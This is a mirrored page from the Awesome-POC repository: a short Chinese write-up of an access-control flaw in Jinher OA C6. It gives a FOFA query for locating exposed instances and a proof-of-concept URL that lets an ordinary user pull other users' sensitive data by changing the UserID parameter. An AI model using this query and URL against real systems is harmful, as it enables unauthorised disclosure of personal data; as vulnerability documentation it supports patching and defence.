admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞.md

37 lines
721 B
Markdown
Raw Normal View History

OA产品漏洞
2022-02-21 09:35:01 +08:00
# 金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞
## 漏洞描述
金和OA C6 存在越权信息泄露漏洞普通用户登录后可以通过遍历ID编号获取管理员及其他用户的敏感信息
## 漏洞影响
```
金和OA C6
```
## FOFA
```
app="Jinher-OA"
```
## 漏洞复现
使用普通用户登录 OA应用后台
访问的POC为
```plain
http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330
```
- 注意 RY120330 需要为确定的其他的用户编号
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090135010.png)
泄露了部分的敏感信息
## 参考文章
https://mp.weixin.qq.com/s/gwHQVIZeMWfT8a5lBX_4WA
Reference in New Issue Copy Permalink